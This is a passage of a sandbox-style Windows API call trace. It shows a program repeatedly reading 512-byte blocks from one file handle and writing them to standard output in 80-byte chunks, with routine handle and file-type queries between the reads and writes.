lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.255] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.255] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.257] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.257] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] 
GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 
[0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.259] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.259] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] GetFileType (hFile=0x50) returned 0x1 [0223.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] GetFileType (hFile=0x50) returned 0x1 [0223.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] GetFileType (hFile=0x50) returned 0x1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.261] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.261] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] GetFileType (hFile=0x50) returned 0x1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] GetFileType (hFile=0x50) returned 0x1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] GetFileType (hFile=0x50) returned 0x1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType 
(hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.263] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.263] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.263] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] GetFileType (hFile=0x50) returned 0x1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] GetFileType (hFile=0x50) returned 0x1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] GetFileType (hFile=0x50) returned 0x1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] GetFileType (hFile=0x50) returned 0x1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] GetFileType (hFile=0x50) returned 0x1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] GetFileType (hFile=0x50) returned 0x1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, 
lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] GetFileType (hFile=0x50) returned 0x1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] GetFileType (hFile=0x50) returned 0x1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.264] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.265] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 
[0223.265] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.266] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.266] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.268] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.268] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, 
